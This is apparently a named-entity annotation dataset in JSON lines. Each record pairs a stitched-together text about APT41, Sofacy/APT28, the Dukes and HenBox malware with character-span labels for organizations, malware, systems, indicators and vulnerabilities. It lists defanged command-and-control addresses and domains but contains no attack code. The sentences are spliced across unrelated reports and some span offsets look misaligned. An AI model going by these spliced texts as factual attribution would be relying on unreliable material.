provider and the targeted payment service . 
In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others .", "spans": [{"start": 34, "end": 40, "label": "Organization"}, {"start": 47, "end": 53, "label": "System"}, {"start": 56, "end": 63, "label": "System"}, {"start": 92, "end": 103, "label": "System"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 254, "end": 270, "label": "Organization"}, {"start": 288, "end": 295, "label": "Organization"}, {"start": 296, "end": 303, "label": "Organization"}, {"start": 320, "end": 332, "label": "Organization"}, {"start": 403, "end": 412, "label": "Malware"}, {"start": 415, "end": 419, "label": "Malware"}, {"start": 426, "end": 432, "label": "Malware"}, {"start": 439, "end": 448, "label": "Malware"}, {"start": 453, "end": 461, "label": "Malware"}, {"start": 498, "end": 505, "label": "Malware"}, {"start": 518, "end": 522, "label": "Malware"}, {"start": 553, "end": 561, "label": "Malware"}]} {"text": "Given the nature of connected devices in smart homes , it \u2019 s highly likely many of these devices , and indeed the controller app itself , communicate with one another sending status notifications , alerts and so on . Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations . 
The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 287, "end": 297, "label": "System"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 412, "end": 424, "label": "Organization"}, {"start": 468, "end": 473, "label": "System"}, {"start": 474, "end": 482, "label": "Vulnerability"}, {"start": 500, "end": 507, "label": "Malware"}, {"start": 514, "end": 534, "label": "Malware"}]} {"text": "Such notifications would be received by the MiHome app or any other , such as HenBox , so long as they register their intent to do so . Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 44, "end": 50, "label": "System"}, {"start": 78, "end": 84, "label": "Malware"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 340, "end": 345, "label": "Organization"}, {"start": 389, "end": 394, "label": "System"}, {"start": 395, "end": 403, "label": "Vulnerability"}, {"start": 421, "end": 428, "label": "Malware"}, {"start": 435, "end": 455, "label": "Malware"}]} {"text": "This could essentially allow for external devices to act as a trigger to execute the malicious HenBox code , or perhaps afford additional data HenBox can collect and exfiltrate . As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files . 
The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 95, "end": 101, "label": "Malware"}, {"start": 143, "end": 149, "label": "Malware"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 263, "end": 278, "label": "System"}, {"start": 427, "end": 432, "label": "System"}, {"start": 433, "end": 441, "label": "Vulnerability"}, {"start": 459, "end": 466, "label": "Malware"}, {"start": 473, "end": 493, "label": "Malware"}]} {"text": "Either method to load HenBox ultimately results in an instance of a service being launched . In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer . Their evolving and modified SPLM , CHOPSTICK , XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 119, "end": 146, "label": "Organization"}, {"start": 269, "end": 273, "label": "Malware"}, {"start": 276, "end": 285, "label": "Malware"}, {"start": 288, "end": 294, "label": "Malware"}]} {"text": "This service hides the app from plain sight and loads another ELF library to gather environmental information about the device , such as running processes and apps , and details about device hardware , primarily through parsing system logs and querying running processes . In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky . 
FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 .", "spans": [{"start": 288, "end": 293, "label": "Organization"}, {"start": 471, "end": 480, "label": "Organization"}, {"start": 483, "end": 490, "label": "Organization"}, {"start": 545, "end": 563, "label": "Organization"}, {"start": 589, "end": 600, "label": "Organization"}]} {"text": "The service continues by loading an ELF , created by Baidu , which is capable of tracking the device location before setting up a monitor to harvest phone numbers associated with outgoing calls for those numbers with a country code \u201c +86 \u201d prefix , which relates to the People \u2019 s Republic of China . Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise . APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": [{"start": 53, "end": 58, "label": "Organization"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 357, "end": 367, "label": "System"}, {"start": 396, "end": 401, "label": "Organization"}, {"start": 442, "end": 453, "label": "Vulnerability"}, {"start": 454, "end": 462, "label": "Vulnerability"}, {"start": 471, "end": 487, "label": "Malware"}, {"start": 488, "end": 497, "label": "Malware"}]} {"text": "Further assets are decrypted and deployed , including another Dalvik DEX code file , which has various capabilities including registering itself as the incoming SMS handler for the device to intercept SMS messages , loading another ELF library that includes a version of BusyBox - a package containing various stripped-down Unix tools useful for administering such systems \u2013 and , interestingly , is capable of turning off the sound played when the device \u2019 s cameras take pictures . 
Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers . Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder .", "spans": [{"start": 271, "end": 278, "label": "System"}, {"start": 541, "end": 548, "label": "Organization"}, {"start": 771, "end": 776, "label": "Organization"}, {"start": 786, "end": 795, "label": "Malware"}]} {"text": "The Android permissions requested by HenBox , as defined in the apps \u2019 AndroidManifest.xml files , range from accessing location and network settings to messages , call , and contact data . Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor . Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 37, "end": 43, "label": "Malware"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 294, "end": 315, "label": "Organization"}, {"start": 414, "end": 428, "label": "Malware"}, {"start": 449, "end": 461, "label": "Organization"}, {"start": 475, "end": 482, "label": "Malware"}]} {"text": "HenBox can also access sensors such as the device camera ( s ) and the microphone . The lure used to target the cryptocurrency exchange (displayed in Figure 5 and translated in Figure 6) referenced an online gaming platform , tying the cryptocurrency targeting to APT41's focus on video game-related targeting . 
As alluded to in our previous blog regarding the Cannon tool , the Sofacy group ( AKA Fancy Bear , APT28 , STRONTIUM , Pawn Storm , Sednit ) has persistently attacked various government and private organizations around the world from mid-October 2018 through mid-November 2018 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 264, "end": 271, "label": "Organization"}, {"start": 281, "end": 299, "label": "Organization"}, {"start": 361, "end": 372, "label": "Malware"}, {"start": 379, "end": 391, "label": "Organization"}, {"start": 398, "end": 408, "label": "Organization"}, {"start": 411, "end": 416, "label": "Organization"}, {"start": 419, "end": 428, "label": "Organization"}, {"start": 431, "end": 441, "label": "Organization"}, {"start": 444, "end": 450, "label": "Organization"}, {"start": 487, "end": 497, "label": "Organization"}]} {"text": "Beyond the Android app itself , other components such as the aforementioned ELF libraries have additional data-stealing capabilities . FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 . 
Russian citizens\u2014journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 216, "end": 221, "label": "Organization"}, {"start": 260, "end": 276, "label": "Organization"}, {"start": 364, "end": 384, "label": "Organization"}, {"start": 387, "end": 406, "label": "Organization"}, {"start": 409, "end": 420, "label": "Organization"}, {"start": 423, "end": 450, "label": "Organization"}, {"start": 457, "end": 464, "label": "Organization"}, {"start": 486, "end": 496, "label": "Organization"}]} {"text": "One ELF library , libloc4d.so , handles amongst other things the loading of the app-decoded ELF library file \u201c sux \u201d , as well as handling connectivity to the C2 . In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": [{"start": 18, "end": 29, "label": "Indicator"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 259, "end": 267, "label": "Malware"}, {"start": 365, "end": 369, "label": "System"}, {"start": 370, "end": 378, "label": "Vulnerability"}, {"start": 381, "end": 394, "label": "Vulnerability"}]} {"text": "The sux library appears to be a customized super user ( su ) tool that includes code from the com.koushikdutta.superuser app and carries the equivalent of a super user ( su ) binary in order to run privileged commands on the system . Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . 
While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant is used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan .", "spans": [{"start": 94, "end": 120, "label": "Indicator"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 446, "end": 454, "label": "Malware"}, {"start": 479, "end": 486, "label": "Malware"}, {"start": 657, "end": 668, "label": "Malware"}]} {"text": "The primary goal of sux appears to steal messages and other data from popular messaging and social media apps specified within the HenBox sample . Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a part-time or contractual basis , or APT41 is a full-time . Once a foothold is established , Sofacy tries to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": [{"start": 131, "end": 137, "label": "Malware"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 324, "end": 329, "label": "Organization"}, {"start": 380, "end": 386, "label": "Organization"}, {"start": 408, "end": 417, "label": "Malware"}, {"start": 420, "end": 432, "label": "Malware"}, {"start": 474, "end": 482, "label": "Malware"}]} {"text": "A similar tool , with the same filename , has been discussed in previous research but the SpyDealer malware appears unrelated to HenBox . APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators . 
Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": [{"start": 90, "end": 99, "label": "Malware"}, {"start": 129, "end": 135, "label": "Malware"}, {"start": 138, "end": 143, "label": "Organization"}, {"start": 188, "end": 208, "label": "System"}, {"start": 330, "end": 339, "label": "Malware"}, {"start": 342, "end": 354, "label": "Malware"}, {"start": 396, "end": 404, "label": "Malware"}]} {"text": "More likely , this is a case of common attack tools being re-used between different threat actor groups . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload .", "spans": [{"start": 128, "end": 136, "label": "Malware"}, {"start": 175, "end": 181, "label": "Organization"}, {"start": 280, "end": 302, "label": "Malware"}, {"start": 355, "end": 374, "label": "Organization"}, {"start": 395, "end": 419, "label": "Organization"}, {"start": 477, "end": 489, "label": "Malware"}]} {"text": "This particular HenBox variant , as listed in Table 3 above , harvests data from two popular messaging and social media apps : Voxer Walkie Talkie Messenger ( com.rebelvox.voxer ) and Tencent \u2019 s WeChat ( com.tencent.mm ) . APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others . 
Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon .", "spans": [{"start": 16, "end": 22, "label": "Malware"}, {"start": 127, "end": 132, "label": "System"}, {"start": 133, "end": 146, "label": "System"}, {"start": 147, "end": 156, "label": "System"}, {"start": 159, "end": 177, "label": "Indicator"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 196, "end": 202, "label": "System"}, {"start": 205, "end": 219, "label": "Indicator"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 350, "end": 358, "label": "System"}, {"start": 361, "end": 369, "label": "System"}, {"start": 372, "end": 377, "label": "System"}, {"start": 380, "end": 384, "label": "System"}, {"start": 391, "end": 398, "label": "System"}, {"start": 449, "end": 461, "label": "Organization"}, {"start": 518, "end": 524, "label": "Malware"}, {"start": 532, "end": 538, "label": "Malware"}]} {"text": "These types of apps tend to store their data in databases and , as an example , HenBox accesses Voxer \u2019 s database from the file \u201c /data/data/com.rebelvox.voxer/databases/rv.db \u201d . HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers . 
Komplex shares a significant amount of functionality and traits with another tool used by Sofacy \u2013 the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows .", "spans": [{"start": 80, "end": 86, "label": "Malware"}, {"start": 131, "end": 176, "label": "Indicator"}, {"start": 181, "end": 189, "label": "System"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 270, "end": 275, "label": "Organization"}, {"start": 294, "end": 307, "label": "Organization"}, {"start": 312, "end": 334, "label": "Organization"}, {"start": 337, "end": 344, "label": "Malware"}, {"start": 427, "end": 433, "label": "Organization"}, {"start": 440, "end": 447, "label": "Malware"}, {"start": 461, "end": 467, "label": "Organization"}, {"start": 525, "end": 532, "label": "System"}]} {"text": "Once opened , HenBox runs the following query to gather message information . HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 . 
The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system \u2013 a move that showcases their continued evolution toward multi-platform attacks .", "spans": [{"start": 14, "end": 20, "label": "Malware"}, {"start": 78, "end": 86, "label": "System"}, {"start": 105, "end": 113, "label": "System"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 186, "end": 192, "label": "Organization"}, {"start": 205, "end": 209, "label": "Organization"}, {"start": 212, "end": 217, "label": "Organization"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 240, "end": 245, "label": "Organization"}, {"start": 252, "end": 264, "label": "Organization"}, {"start": 277, "end": 291, "label": "Malware"}]} {"text": "Not long after this variant was public , newer variants of HenBox were seen , and some had significant increases in the number of targeted apps . APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data . The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease .", "spans": [{"start": 59, "end": 65, "label": "Malware"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 161, "end": 174, "label": "System"}, {"start": 248, "end": 262, "label": "Malware"}, {"start": 292, "end": 298, "label": "Organization"}, {"start": 302, "end": 309, "label": "Malware"}, {"start": 318, "end": 324, "label": "Malware"}, {"start": 394, "end": 401, "label": "System"}, {"start": 434, "end": 436, "label": "System"}]} {"text": "Table 5 describes the latest variant seen in AutoFocus . Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 . 
This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc. - of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": [{"start": 73, "end": 88, "label": "Organization"}, {"start": 111, "end": 119, "label": "System"}, {"start": 218, "end": 226, "label": "Malware"}, {"start": 229, "end": 239, "label": "Malware"}, {"start": 242, "end": 251, "label": "Malware"}, {"start": 254, "end": 262, "label": "Malware"}, {"start": 279, "end": 284, "label": "Organization"}]} {"text": "SHA256 Package Name App Name First Seen 07994c9f2eeeede199dd6b4e760fce371f03f3cc4307e6551c18d2fbd024a24f com.android.henbox \u5907\u4efd ( Backup ) January 3rd 2018 Table 6 contains an updated list of targeted apps from which this newer variant of HenBox is capable of harvesting data . At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group . 
The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": [{"start": 40, "end": 104, "label": "Indicator"}, {"start": 105, "end": 123, "label": "Indicator"}, {"start": 238, "end": 244, "label": "Malware"}, {"start": 318, "end": 330, "label": "System"}, {"start": 335, "end": 344, "label": "System"}, {"start": 365, "end": 370, "label": "Organization"}, {"start": 411, "end": 416, "label": "Organization"}, {"start": 423, "end": 428, "label": "Organization"}]} {"text": "Interestingly , the two communication apps described above as being targeted by the HenBox variant listed in Table 3 do not appear in this updated list . APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and non-gaming organizations . The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke .", "spans": [{"start": 154, "end": 159, "label": "Organization"}, {"start": 180, "end": 205, "label": "System"}, {"start": 253, "end": 277, "label": "Organization"}, {"start": 284, "end": 289, "label": "Organization"}, {"start": 368, "end": 376, "label": "Malware"}, {"start": 379, "end": 389, "label": "Malware"}, {"start": 392, "end": 401, "label": "Malware"}, {"start": 404, "end": 412, "label": "Malware"}, {"start": 415, "end": 424, "label": "Malware"}, {"start": 427, "end": 434, "label": "Malware"}, {"start": 437, "end": 447, "label": "Malware"}, {"start": 450, "end": 459, "label": "Malware"}, {"start": 466, "end": 476, "label": "Malware"}]} {"text": "Package Name App Name com.whatsapp WhatsApp Messenger com.pugna.magiccall n/a org.telegram.messenger Telegram com.facebook.katana Facebook 
com.twitter.android Twitter jp.naver.line.android LINE : Free Calls & Messages com.instanza.cocovoice Coco com.beetalk BeeTalk com.gtomato.talkbox TalkBox Voice Messenger - PTT com.viber.voip Viber Messenger com.immomo.momo MOMO\u964c\u964c com.facebook.orca Messenger \u2013 Text and Video Chat for Free com.skype.rover In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted . The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found .", "spans": [{"start": 22, "end": 34, "label": "Indicator"}, {"start": 35, "end": 43, "label": "System"}, {"start": 44, "end": 53, "label": "System"}, {"start": 54, "end": 73, "label": "Indicator"}, {"start": 78, "end": 100, "label": "Indicator"}, {"start": 101, "end": 109, "label": "System"}, {"start": 110, "end": 129, "label": "Indicator"}, {"start": 130, "end": 138, "label": "System"}, {"start": 139, "end": 158, "label": "Indicator"}, {"start": 159, "end": 166, "label": "System"}, {"start": 167, "end": 188, "label": "Indicator"}, {"start": 189, "end": 193, "label": "System"}, {"start": 218, "end": 240, "label": "Indicator"}, {"start": 246, "end": 257, "label": "Indicator"}, {"start": 258, "end": 265, "label": "System"}, {"start": 266, "end": 285, "label": "Indicator"}, {"start": 286, "end": 293, "label": "System"}, {"start": 300, "end": 309, "label": "System"}, {"start": 316, "end": 330, "label": "Indicator"}, {"start": 331, "end": 336, "label": "System"}, {"start": 337, "end": 346, "label": "System"}, {"start": 347, "end": 362, "label": "Indicator"}, {"start": 363, "end": 369, "label": "System"}, {"start": 370, "end": 387, "label": "Indicator"}, {"start": 388, "end": 397, "label": "System"}, {"start": 429, "end": 444, "label": "Indicator"}, {"start": 460, "end": 465, "label": "Organization"}, {"start": 625, "end": 639, "label": "Organization"}, {"start": 658, "end": 666, 
"label": "Malware"}, {"start": 691, "end": 703, "label": "Malware"}, {"start": 704, "end": 711, "label": "Malware"}]} {"text": "Skype ; 3rd party stores only Most of these apps are well established and available on Google Play , however , com.skype.rover appears to be available only on third-party app stores . In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 87, "end": 98, "label": "System"}, {"start": 111, "end": 126, "label": "Indicator"}, {"start": 205, "end": 210, "label": "Organization"}, {"start": 221, "end": 231, "label": "System"}, {"start": 330, "end": 335, "label": "Organization"}, {"start": 481, "end": 489, "label": "Malware"}, {"start": 572, "end": 577, "label": "Organization"}]} {"text": "The same is likely to be the case for com.pugna.magiccall but this is unknown currently . In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company . 
Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda .", "spans": [{"start": 38, "end": 57, "label": "Indicator"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 115, "end": 125, "label": "System"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 178, "end": 185, "label": "Organization"}, {"start": 231, "end": 248, "label": "Malware"}, {"start": 291, "end": 302, "label": "Organization"}, {"start": 355, "end": 374, "label": "Organization"}, {"start": 394, "end": 423, "label": "Organization"}]} {"text": "It \u2019 s clear to see that the capabilities of HenBox are very comprehensive , both in terms of an Android app with its native libraries and given the amount of data it can glean from a victim . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . Importantly , PinchDuke trojan samples always contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel .", "spans": [{"start": 45, "end": 51, "label": "Malware"}, {"start": 97, "end": 104, "label": "System"}, {"start": 203, "end": 208, "label": "Organization"}, {"start": 245, "end": 252, "label": "Vulnerability"}, {"start": 262, "end": 275, "label": "Vulnerability"}, {"start": 328, "end": 352, "label": "Malware"}, {"start": 449, "end": 460, "label": "Organization"}]} {"text": "Such data includes contact and location information , phone and message activity , the ability to record from the microphone , camera , and other sensors as well as the capability to access data from many popular messaging and social media apps . 
APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke \u2013 over the course of five years .", "spans": [{"start": 247, "end": 252, "label": "Organization"}, {"start": 266, "end": 282, "label": "Organization"}, {"start": 427, "end": 438, "label": "Organization"}, {"start": 547, "end": 557, "label": "Malware"}, {"start": 560, "end": 569, "label": "Malware"}, {"start": 576, "end": 584, "label": "Malware"}]} {"text": "Infrastructure While investigating HenBox we discovered infrastructure ties to other malware families associated with targeted attacks against Windows users \u2013 notable overlaps included PlugX , Zupdax , 9002 , and Poison Ivy . We observed APT41 using a compromised account to create a scheduled task on a system , write a binary component of HIGHNOON containing the payload and C&C information to disk , and then modify the legitimate Windows WMI Performance Adaptor (wmiApSrv) to execute the HIGHNOON payload . 
The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke .", "spans": [{"start": 35, "end": 41, "label": "Malware"}, {"start": 143, "end": 150, "label": "System"}, {"start": 185, "end": 190, "label": "Malware"}, {"start": 193, "end": 199, "label": "Malware"}, {"start": 202, "end": 206, "label": "Malware"}, {"start": 213, "end": 223, "label": "Malware"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 515, "end": 520, "label": "Organization"}, {"start": 611, "end": 619, "label": "Malware"}, {"start": 624, "end": 632, "label": "Malware"}]} {"text": "The overall image of these ties is below in Figure 5 and paints a picture of an adversary with at least 5 malware families in their toolbox dating back to at least 2015 . The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors . As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years .", "spans": [{"start": 175, "end": 180, "label": "Organization"}, {"start": 307, "end": 315, "label": "System"}, {"start": 320, "end": 324, "label": "System"}, {"start": 375, "end": 386, "label": "Organization"}, {"start": 406, "end": 414, "label": "Malware"}]} {"text": "The overlap between the HenBox and 9002 malware families Unit 42 has seen involves three shared C2s between several samples ; the first IP below is used for more than half of the HenBox samples we have seen to date : 47.90.81 [ . APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities . 
Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed .", "spans": [{"start": 24, "end": 30, "label": "Malware"}, {"start": 35, "end": 39, "label": "Malware"}, {"start": 179, "end": 185, "label": "Malware"}, {"start": 217, "end": 229, "label": "Indicator"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 465, "end": 470, "label": "Organization"}]} {"text": "] 23 222.139.212 [ . To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files . This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis .", "spans": [{"start": 5, "end": 20, "label": "Indicator"}, {"start": 44, "end": 49, "label": "Organization"}, {"start": 74, "end": 85, "label": "System"}, {"start": 102, "end": 117, "label": "System"}, {"start": 120, "end": 128, "label": "System"}, {"start": 131, "end": 139, "label": "System"}, {"start": 142, "end": 164, "label": "System"}, {"start": 274, "end": 280, "label": "Organization"}]} {"text": "] 16 lala513.gicp [ . APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors . 
The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way .", "spans": [{"start": 5, "end": 21, "label": "Indicator"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 38, "end": 46, "label": "System"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 310, "end": 315, "label": "Organization"}]} {"text": "] net The overlaps between the HenBox , PlugX , Zupdax , and Poison Ivy malware families involve a web of shared C2s and IP resolutions centered around the below : 59.188.196 [ . APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic . In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 40, "end": 45, "label": "Malware"}, {"start": 48, "end": 54, "label": "Malware"}, {"start": 61, "end": 71, "label": "Malware"}, {"start": 164, "end": 178, "label": "Indicator"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 359, "end": 370, "label": "Organization"}, {"start": 496, "end": 506, "label": "Malware"}]} {"text": "] 172 cdncool [ . In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . 
The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": [{"start": 6, "end": 17, "label": "Indicator"}, {"start": 38, "end": 43, "label": "Organization"}, {"start": 54, "end": 64, "label": "System"}, {"start": 105, "end": 113, "label": "System"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 192, "end": 202, "label": "Malware"}]} {"text": "] com ( and third-levels of this domain ) www3.mefound [ . The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence . For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke .", "spans": [{"start": 42, "end": 58, "label": "Indicator"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 265, "end": 272, "label": "Malware"}, {"start": 277, "end": 287, "label": "Malware"}]} {"text": "] com www5.zyns [ . APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online . Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 20, "end": 25, "label": "Organization"}]} {"text": "] com w3.changeip [ . APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence . 
In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke .", "spans": [{"start": 6, "end": 21, "label": "Indicator"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 45, "end": 49, "label": "System"}, {"start": 54, "end": 63, "label": "System"}, {"start": 206, "end": 211, "label": "Organization"}, {"start": 279, "end": 289, "label": "Malware"}]} {"text": "] org Ties to previous activity The registrant of cdncool [ . Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": [{"start": 50, "end": 61, "label": "Indicator"}, {"start": 129, "end": 146, "label": "System"}, {"start": 149, "end": 154, "label": "Organization"}, {"start": 212, "end": 217, "label": "System"}, {"start": 349, "end": 362, "label": "Vulnerability"}, {"start": 373, "end": 381, "label": "Malware"}, {"start": 435, "end": 443, "label": "Vulnerability"}, {"start": 484, "end": 491, "label": "Vulnerability"}]} {"text": "] com also registered six other domains . Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 . 
